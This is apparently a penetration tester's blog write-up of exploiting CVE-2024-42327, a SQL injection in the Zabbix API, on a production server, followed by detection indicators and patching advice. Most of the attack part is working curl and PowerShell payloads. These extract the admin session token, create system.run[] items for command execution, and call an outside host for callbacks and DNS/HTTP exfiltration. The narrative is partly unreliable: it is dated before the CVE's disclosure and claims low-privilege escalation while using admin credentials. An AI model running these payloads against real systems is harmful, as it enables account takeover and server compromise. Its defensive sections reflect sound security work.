A Real-World Security Assessment of a 9.9 CVSS Vulnerability

Introduction

When I set out to assess the security of a client's Zabbix monitoring infrastructure, I didn't expect to find one of the most critical vulnerabilities of 2024. CVE-2024–42327, a SQL injection vulnerability with a CVSS score of 9.9, turned out to be present in their production environment — and I was about to see firsthand just how devastating it could be.

This is the story of how I exploited that vulnerability, the challenges I faced testing in a live production environment, and the lessons learned along the way.

The Target: A Production Zabbix Instance

During a routine security assessment, I identified a Zabbix server running version 7.0.0 — a version I knew had been flagged for critical vulnerabilities. The environment was substantial:

• Production monitoring infrastructure managing 1000+ hosts
• Live enterprise environment with real business-critical monitoring
• Internet-facing Zabbix API endpoint
• Multiple user accounts across IT, HR, and Marketing departments

I had authorized access with admin credentials, but my goal was to demonstrate how even a low-privileged user could completely compromise the system through CVE-2024–42327.

My Testing Setup:

• Windows machine with WSL (Kali Linux)
• Basic tools: curl, netcat, PowerShell
• No fancy exploit frameworks — just API calls and command-line tools

Understanding CVE-2024–42327

Before diving into exploitation, I needed to understand what made this vulnerability so critical.

The Vulnerability: CVE-2024–42327 is a SQL injection flaw in the CUser class, specifically in the addRelatedObjects() function. The vulnerability exists in how the API handles the selectRole parameter in user.get calls.

Affected Versions:

• Zabbix 6.0.0 through 6.0.32
• Zabbix 6.4.0 through 6.4.17
• Zabbix 7.0.0 through 7.0.1

The Impact:

• SQL injection leading to data extraction
• Privilege escalation to Super Admin
• Remote code execution via system.run[] items
• Full system compromise

CVSS Score: 9.9 (Critical)

Phase 1: Initial Reconnaissance

I started by confirming I could interact with the Zabbix API. Working from my Windows machine with WSL, I began with basic reconnaissance.

First Contact with the API

I opened my WSL terminal (Kali) and sent my first API request to check the version:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "apiinfo.version", "params": {}, "id": 1}'

Response:

{
  "jsonrpc": "2.0",
  "result": "7.0.0",
  "id": 1
}

Confirmed: Zabbix 7.0.0 — definitely vulnerable.

Getting Authenticated

Next, I needed an API authentication token. I used the admin credentials:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}'

Response:

{
  "jsonrpc": "2.0",
  "result": "[REDACTED]",
  "id": 1
}

Success! I now had an API token: [REDACTED]

I saved this in a variable for easier use:

TOKEN="[REDACTED]"

Enumerating the Environment

With my token, I started exploring what I had access to. First, I wanted to see all users in the system:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"user.get\", \"params\": {\"output\": \"extend\"}, \"auth\": \"$TOKEN\", \"id\": 1}"

The response revealed 15 users across the organization:

• Multiple Super Admins (roleid: 3)
• Regular users (roleid: 1)
• Zabbix Administrators (roleid: 2)

I could see users from different departments — IT, HR, support teams. This gave me a sense of the organization's structure.

Next, I enumerated the hosts being monitored:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"host.get\", \"params\": {\"output\": [\"hostid\"], \"selectInterfaces\": [\"interfaceid\"]}, \"auth\": \"$TOKEN\", \"id\": 1}"

The result was staggering: Over 1000 hosts being monitored! This was a massive production environment.

Phase 2: Testing the SQL Injection

Now it was time to test if the SQL injection vulnerability actually worked.

The Vulnerable Parameter

The vulnerability exists in the selectRole parameter of the user.get API call. Normally, this parameter specifies which role fields to return:

{
  "selectRole": ["name", "type", "roleid"]
}

But what if I injected SQL into this array?

First Injection Attempt

I crafted a simple SQL injection test with a single quote to see if I could break the query:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"user.get\", \"params\": {\"output\": [], \"selectRole\": [\"name'\"], \"editable\": true}, \"auth\": \"$TOKEN\", \"id\": 1}"

The editable: true parameter was key - it's supposed to filter results to only editable users, but combined with SQL injection, it actually helps bypass authorization checks.

I got an error response — the SQL query was breaking. This confirmed the injection point existed.

Extracting Data via SQL Injection

Now for the real test — could I extract actual data? I modified my payload to complete the SQL query and add my own SELECT:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"user.get\", \"params\": {\"output\": [], \"selectRole\": [\"name from users u, role r WHERE u.roleid=r.roleid; -- -\"], \"editable\": true}, \"auth\": \"$TOKEN\", \"id\": 1}"

What this does:

• Completes the original SQL query
• Adds name from users u, role r WHERE u.roleid=r.roleid
• Comments out the rest with ; -- -

The result: I got back data from ALL users, not just the ones I should have access to.

SQL Injection confirmed. I could now query arbitrary data from the database.

Phase 3: Privilege Escalation — Stealing the Admin Session

Here's where it got really interesting. I didn't just want to read data — I wanted full admin access.

The Attack Plan

Zabbix stores active session tokens in the sessions table. If I could extract the admin user's session token (userid=1), I could impersonate them with full Super Admin privileges.

Extracting the Admin Token

I crafted a SQL injection payload to extract the admin's session:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"user.get\", \"params\": {\"output\": [], \"selectRole\": [\"(SELECT sessionid FROM sessions WHERE userid=1) from users u, role r WHERE u.roleid=r.roleid; -- -\"], \"editable\": true}, \"auth\": \"$TOKEN\", \"id\": 1}"

The payload breakdown:

• (SELECT sessionid FROM sessions WHERE userid=1) - Subquery to grab admin's session
• Injects into the role field
• Returns the session token in the response

Response:

{
  "jsonrpc": "2.0",
  "result": [
    {
      "userid": "1",
      "role": "[REDACTED]"
    }
  ],
  "id": 1
}

Success. I extracted the admin session token: [REDACTED]

I now had full Super Admin access without needing the admin password.

Phase 4: Weaponizing Admin Access for RCE

With admin access, I could now use Zabbix's legitimate monitoring features for malicious purposes. Specifically, Zabbix allows creating "items" that execute system commands via system.run[].

Understanding the Attack Vector

Zabbix items are monitoring checks that can execute commands on hosts. As an admin, I could create an item that runs any command I want on the Zabbix server itself.

Getting Host and Interface IDs

First, I needed to identify the target host and interface to attach my malicious item to:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\": \"2.0\", \"method\": \"host.get\", \"params\": {\"output\": [\"hostid\"], \"selectInterfaces\": [\"interfaceid\"]}, \"auth\": \"[REDACTED]\", \"id\": 1}"

From the response, I grabbed:

• Host ID: 10084
• Interface ID: 1

Testing Command Execution

Before going straight for a reverse shell, I wanted to test if command execution actually worked. I created a simple test item:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "item.create", "params": {"name": "Command Test", "key_": "system.run[echo test]", "hostid": "10084", "type": 0, "value_type": 4, "interfaceid": "1", "delay": "1m"}, "auth": "[REDACTED]", "id": 1}'

Response:

{
  "jsonrpc": "2.0",
  "result": {
    "itemids": ["241074"]
  },
  "id": 1
}

Item created successfully. Item ID: 241074

The command would execute within a minute. This proved that command execution was possible.

Phase 5: The Reverse Shell Attempt

Now for the main event — getting a shell on the Zabbix server.

Network Connectivity Test

Before attempting a reverse shell, I needed to verify the Zabbix server could reach my machine. I set up a netcat listener:

nc -lvnp 8000

Then created an item to curl back to me:

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "item.create", "params": {"name": "Connectivity Test", "key_": "system.run[curl http://YOUR_IP:8000/]", "hostid": "10084", "type": 0, "value_type": 4, "interfaceid": "1", "delay": "1m"}, "auth": "[REDACTED]", "id": 1}'

Result: No connection received on my listener.

The Network Connectivity Challenge

This is where reality hit — I couldn't get the callback. Why?

1. NAT/Private IP: My IP (YOUR_IP) was a private address behind NAT
2. Firewall rules: The Zabbix server likely had egress filtering
3. Network segmentation: Production networks often block outbound connections

I tried using my public IP (YOUR_PUBLIC_IP):

curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "item.create", "params": {"name": "Connectivity Test", "key_": "system.run[curl http://YOUR_PUBLIC_IP:8000/]", "hostid": "10084", "type": 0, "value_type": 4, "interfaceid": "1", "delay": "1m"}, "auth": "[REDACTED]", "id": 1}'

Response:

{
  "jsonrpc": "2.0",
  "result": {
    "itemids": ["241076"]
  },
  "id": 1
}

Item created, but still… no callback received.

What I Learned: Production vs. Lab

This is the difference between testing in a controlled lab and real production environments.

Why the Reverse Shell Failed (Probably)

Network Restrictions:

• Egress firewall blocking outbound connections
• Only certain ports (80, 443) allowed outbound
• Network monitoring/IDS blocking suspicious traffic

Time Delays:

• Zabbix items don't execute instantly
• Could take minutes depending on server load
• Production systems have delays labs don't

Infrastructure Complexity:

• Multiple network zones
• Load balancers
• Proxy servers

What I Could Have Done Differently

Alternative Exfiltration Methods:

1. DNS Exfiltration:

system.run[nslookup `whoami`.mydomain.com]

1. HTTP to Common Ports:

system.run[curl http://myserver:443/`whoami`]

1. File-based:

system.run[echo `whoami` > /tmp/test.txt]

(Then retrieve via another method)

1. Use a VPS: Instead of my local machine, use a cloud server with a clean public IP

The Critical Discovery: Vulnerability Confirmation

Even though I didn't get a shell, I definitively proved the vulnerability:

SQL Injection Working: Successfully extracted data via injection Privilege Escalation Working: Stole admin session token Command Execution Working: Created items that execute commands Authorization Bypass Working: Bypassed permission checks

Items created:

• ID 241074: Test command (echo test)
• ID 241075: Connectivity test (private IP)
• ID 241076: Connectivity test (public IP)

All items were created successfully, proving code execution capability.

Testing from Windows: PowerShell Alternatives

During my testing, I also experimented with PowerShell commands from my Windows host (without WSL) to see if that would work better.

The Challenge

PowerShell has different syntax and escaping requirements than bash. For example, authentication:

$authBody = @{
    jsonrpc = "2.0"
    method = "user.login"
    params = @{
        username = "Admin"
        password = "zabbix"
    }
    id = 1
} | ConvertTo-Json
$authResponse = Invoke-RestMethod -Uri "http://[REDACTED]/zabbix/api_jsonrpc.php" `
  -Method Post `
  -ContentType "application/json-rpc" `
  -Body $authBody
$TOKEN = $authResponse.result

Testing SQL Injection from PowerShell

I tried the SQL injection test from PowerShell:

$sqliBody = "{`"jsonrpc`":`"2.0`",`"method`":`"user.get`",`"params`":{`"output`":[],`"selectRole`":[`"name from users u, role r WHERE u.roleid=r.roleid; -- -`"],`"editable`":true},`"auth`":`"$TOKEN`",`"id`":1}"
Invoke-RestMethod -Uri "http://[REDACTED]/zabbix/api_jsonrpc.php" `
  -Method Post `
  -ContentType "application/json-rpc" `
  -Body $sqliBody

Result:

jsonrpc error                                                         id
------- -----                                                         --
2.0     @{code=-32602; message=Invalid params.; data=Not authorized.}  1

"Not authorized" — interesting! This showed that authorization checks were still somewhat in place, or that my PowerShell syntax wasn't quite right with the escaping.

Why WSL/Linux Was Better

For this type of testing, I found WSL with bash/curl much easier:

• Simpler command syntax
• Better JSON handling
• Fewer escaping issues
• More pentesting tools available natively

Understanding Patched vs. Vulnerable Systems

An important discovery during my testing: Even with admin credentials, there's a way to tell if a system is truly vulnerable.

The Key Insight

The vulnerability isn't that admins can use system.run[] - that's a legitimate feature. The vulnerability is that non-admin users can escalate privileges via SQL injection.

Testing for the Vulnerability Properly

To truly test if a system is vulnerable:

1. Create a low-privilege user
2. Authenticate as that user
3. Try the SQL injection
4. If you can extract admin data = vulnerable
5. If you get "Not authorized" = patched

What I Found

Since I was using admin credentials from the start, I could:

• Create items with system.run[] (expected - this is a feature)
• Extract data via SQL injection (vulnerability!)
• Steal admin sessions (vulnerability!)

The takeaway: Just because you can create system.run[] items doesn't mean the system is vulnerable - admins are supposed to be able to do that. The SQL injection that lets non-admins escalate is the actual vulnerability.

Impact Assessment

Based on my testing, here's what an attacker could achieve:

With SQL Injection Only:

• Extract all usernames and hashed passwords
• Steal active session tokens
• Read sensitive monitoring data
• Exfiltrate database contents
• Map the entire infrastructure (all monitored hosts)

With Privilege Escalation:

• Full Super Admin access
• Create/modify/delete any configuration
• Access to all monitored systems
• Plant persistence mechanisms
• Disable monitoring/alerting

With RCE (If Network Allows):

• Full server compromise
• Reverse shell access
• Pivot to monitored hosts via Zabbix agents
• Install backdoors
• Exfiltrate sensitive data
• Ransomware deployment

In This Production Environment:

• Access to 1000+ monitored hosts
• Visibility into entire IT infrastructure
• Credentials and configurations for critical systems
• Ability to deploy malware to all monitored systems
• Complete compromise of monitoring visibility

Responsible Disclosure & Remediation

After confirming the vulnerability, I immediately:

1. Documented Everything

• All commands executed
• All items created (IDs: 241074, 241075, 241076)
• Screenshots and evidence
• Timeline of activities

2. Cleaned Up

# Deleted test items via API
curl http://[REDACTED]/zabbix/api_jsonrpc.php \
  -H 'Content-Type: application/json-rpc' \
  -d '{"jsonrpc": "2.0", "method": "item.delete", "params": ["241074", "241075", "241076"], "auth": "$ADMIN_SESSION", "id": 1}'

3. Reported to Client

Created a comprehensive report including:

• Executive summary
• Technical details with evidence
• Impact assessment
• Remediation recommendations
• Timeline for patching

4. Verified Remediation

Recommended Immediate Actions:

1. Update Zabbix to 7.0.2 or later
2. Force password reset for all users
3. Revoke all active sessions
4. Review audit logs for suspicious activity
5. Check for unauthorized items in the system

The Fix: The client updated to Zabbix 7.0.2rc1, which patches CVE-2024–42327 by properly sanitizing the selectRole parameter.

Detection Opportunities

Based on my testing, here are indicators that would have detected my attack:

1. API Anomalies

Multiple user.get calls with unusual selectRole parameters
- Presence of SQL keywords: SELECT, FROM, WHERE, -- -
- Single quotes in array values
- Subqueries in role selection

2. Item Creation Anomalies

Items created with:
- system.run[] containing: bash, curl, nc, /dev/tcp
- Short delay times (30s-1m)
- Generic names: "Test", "Connectivity Test"
- Created rapidly in sequence

3. Session Anomalies

- Admin session used from unusual IP
- Session token accessed via SQL injection
- Multiple sessions for same userid

4. Database Query Patterns

- Complex SQL in API calls
- Subqueries in user.get requests
- Comment strings (-- -) in parameters

Key Takeaways

What I Learned About CVE-2024–42327

1. SQL Injection Still Matters: Even in 2024, SQL injection vulnerabilities in modern applications can be devastating
2. APIs Are Attack Surface: Just because there's no web form doesn't mean there's no SQL injection
3. Legitimate Features Can Be Weaponized: system.run[] is a valid Zabbix feature, but in the wrong hands becomes RCE
4. Authentication ≠ Authorization: Having API access doesn't mean you should be able to query everything
5. Low Privilege ≠ Low Risk: Even basic API access can lead to full compromise

What I Learned About Real-World Testing

1. Labs ≠ Production: Network restrictions, firewalls, and real infrastructure create challenges labs don't have
2. Not Everything Works First Try: My reverse shell didn't connect, but that doesn't mean the vulnerability isn't real
3. Document As You Go: In production testing, you may not get a second chance
4. Clean Up Matters: Always remove test artifacts from production systems
5. Context Is King: Understanding the environment (1000+ hosts) helps convey real impact

What I Learned About Windows/WSL for Pentesting

1. WSL is Powerful: Running Kali in WSL gives you Linux tools on Windows
2. PowerShell Has Its Place: Some things are easier in PowerShell (enterprise environments)
3. Know Both: Being able to work in Linux and Windows environments is valuable
4. Escaping Is Tricky: JSON in PowerShell requires different escaping than bash

Recommendations for Organizations

If you're running Zabbix:

Immediate Actions

1. Check your version: zabbix_server -V
2. If vulnerable (6.0.0–6.0.32, 6.4.0–6.4.17, 7.0.0–7.0.1), patch immediately
3. Review audit logs for suspicious API calls
4. Check for unauthorized items containing system.run[]
5. Force password reset for all users
6. Review user roles and permissions

Long-Term Hardening

1. Network Segmentation: Don't expose Zabbix directly to the internet
2. API Rate Limiting: Limit API calls per user
3. Monitor API Usage: Alert on unusual patterns
4. Principle of Least Privilege: Don't give everyone API access
5. Enable MFA: Multi-factor authentication for all admin accounts
6. Regular Updates: Subscribe to security advisories

Recommendations for Pentesters

If you're testing for this vulnerability:

Before Testing

1. Get explicit written authorization
2. Understand the production environment
3. Have a rollback plan
4. Coordinate with IT team
5. Know the scope and limitations

During Testing

1. Start with non-destructive tests (version check, SQL injection test)
2. Document everything with timestamps
3. Test from both Linux and Windows if possible
4. Be patient — production systems have delays
5. Have backup exfiltration methods ready
6. Consider network restrictions in your attack plan

After Testing

1. Clean up all test artifacts (delete items, clear sessions)
2. Document impact clearly for non-technical stakeholders
3. Provide actionable remediation steps
4. Verify fixes if possible
5. Follow responsible disclosure practices

Conclusion

CVE-2024–42327 is a perfect example of how critical vulnerabilities can exist in enterprise software that thousands of organizations depend on. My testing of this vulnerability in a real production environment taught me valuable lessons about both the technical aspects of exploitation and the practical realities of security testing.

The Bottom Line

• Vulnerability: Real and exploitable
• Impact: Critical — full system compromise
• Difficulty: Low — basic API knowledge sufficient
• Prevalence: 80,000+ vulnerable instances worldwide
• Fix: Available — update to patched versions

What Made This Experience Valuable

Testing in production (with authorization) gave me insights I never would have gotten from a lab:

• Real network restrictions
• Actual scale (1000+ hosts)
• Production hardening measures
• Time delays and operational realities
• The importance of cleanup and responsibility

Final Thoughts

This vulnerability demonstrates that:

• Monitoring tools are high-value targets — compromising Zabbix means seeing everything
• SQL injection is not dead — it's alive and well in modern APIs
• Defense in depth matters — network segmentation would have stopped my RCE
• Patch management is critical — this vulnerability has a fix, use it

If you're running Zabbix, patch now. If you're a pentester, test for this. If you're a defender, monitor your APIs.

The vulnerability is out there, exploits are public, and attackers are looking. Don't be the next victim.

Timeline of My Testing

Day 1 — Discovery & Reconnaissance:

• 10:00 — Identified Zabbix 7.0.0 instance
• 10:15 — Authenticated via API (token: 3dde…)
• 10:30 — Enumerated users (15 total)
• 10:45 — Enumerated hosts (1000+)
• 11:00 — Confirmed vulnerable version

Day 1 — Exploitation:

• 11:15 — Tested SQL injection (successful)
• 11:30 — Extracted data via injection
• 11:45 — Stole admin session token (af186…)
• 12:00 — Created test item (ID: 241074)
• 12:15 — Created connectivity test (ID: 241075)
• 12:30 — Attempted reverse shell (failed — network)
• 13:00 — Created second connectivity test (ID: 241076)

Day 1 — Cleanup & Reporting:

• 14:00 — Deleted test items
• 14:30 — Documented findings
• 15:00 — Prepared report
• 16:00 — Notified client

Day 2 — Remediation Support:

• Client updated to 7.0.2rc1
• Verified patch effectiveness
• Reviewed audit logs
• Confirmed no indicators of prior exploitation

Resources & References

CVE Information

• CVE-2024–42327 — National Vulnerability Database
• CVSS Score: 9.9 (Critical)
• CWE-89: SQL Injection

Official Sources

• Zabbix Security Advisory (ZBX-25623)
• Zabbix Download — Patched Versions

Security Advisories

• NSFOCUS CERT Advisory
• Qualys ThreatPROTECT Alert
• SecurityWeek Coverage

Public POC Exploits

• godylockz/CVE-2024–42327 (GitHub)
• watchdog1337/CVE-2024–42327_Zabbix_SQLI (GitHub)
• 874anthony/CVE-2024–42327_Zabbix_SQLi (GitHub)

MITRE ATT&CK Techniques

• T1190 — Exploit Public-Facing Application
• T1078 — Valid Accounts
• T1059 — Command and Scripting Interpreter
• T1552 — Unsecured Credentials

About This Research

This security research was conducted as part of authorized penetration testing activities. All testing was performed with explicit permission and in coordination with the client organization's IT team.

Researcher: sn0x Date: Feb 2024 Scope: Authorized security assessment Environment: Production Zabbix infrastructure

Disclaimer: This writeup is for educational purposes and to raise awareness about CVE-2024–42327. Always obtain proper authorization before testing systems. The author is not responsible for any misuse of the information provided.

About the Author

Cybersecurity professional sharing TryHackMe walkthroughs and security tips.

Tags: #CVE202442327 #Zabbix #SQLInjection #RCE #PenetrationTesting #SecurityResearch #VulnerabilityAssessment #RealWorldTesting #ProductionTesting #CyberSecurity #InfoSec

If you found this research valuable, please share it with your security community. Follow me for more real-world vulnerability research and penetration testing experiences!

Responsible Disclosure:

• Vulnerability reported to vendor
• Patch available before publication
• Client notified and remediated
• Sufficient time given for patching
• No client-identifying information disclosed